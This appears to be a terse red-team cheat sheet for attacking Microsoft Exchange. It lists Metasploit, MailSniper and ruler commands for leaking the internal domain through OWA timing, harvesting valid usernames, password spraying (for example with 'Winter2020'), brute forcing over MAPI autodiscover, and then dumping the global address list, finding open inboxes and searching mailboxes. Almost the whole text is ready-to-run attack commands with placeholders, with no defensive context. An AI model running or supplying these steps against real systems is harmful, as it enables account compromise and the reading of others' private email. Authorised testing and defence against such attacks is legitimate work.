Exchange

References

OWA - Leak domain, obtain email addresses and password spray

1. Find a service to spray

Generally located at mail.target.com or target.com/owa

2. Obtain the domain name

Look for domain leak

use auxiliary/scanner/http/owa_login

Guessing based on time response

Invoke-DomainHarvestOWA -ExchHostname <target.com/owa> -DomainList <domain_guessing_list.txt> -OutFile <potential_domains.txt>
3. Obtain email addresses

See OSINT

Can validate credentials or just the login if the password is wrong but the username exists.

use auxiliary/scanner/http/owa_login
Invoke-UsernameHarvestOWA -ExchHostname <target.com/owa> -UserList <user_list.txt> -Domain <target.local> -OutFile <potential_usernames.txt>
4. Password spray
use auxiliary/scanner/http/owa_login
Invoke-PasswordSprayOWA -ExchHostname <target.com/owa> -userlist <user_list.txt> -Domain <target.local> -password <Winter2020>

MAPI over HTTP

Password spray
./ruler-linux64 -k --url https://autodiscover.<domain.int>/autodiscover/autodiscover.xml brute --users /tmp/user.txt --passwords /tmp/passwords.txt

Mailboxes rights review - Mail Sniper

1. Get global address list (OWA)
Get-GlobalAddressList -ExchHostname <mail.domain.int> -username <domain>\<user> -Password "<password>" -outfile global-address-list.txt
2. Dump mailboxes accesses (EWS)
Invoke-OpenInboxFinder -EmailList .\global-address-list.txt -Remote -ExchHostname <mail.domain.int>
3. Search for keywords in inbox
Invoke-SelfSearch -Mailbox <user@domain.int> -Remote -ExchHostname <mail.domain.int>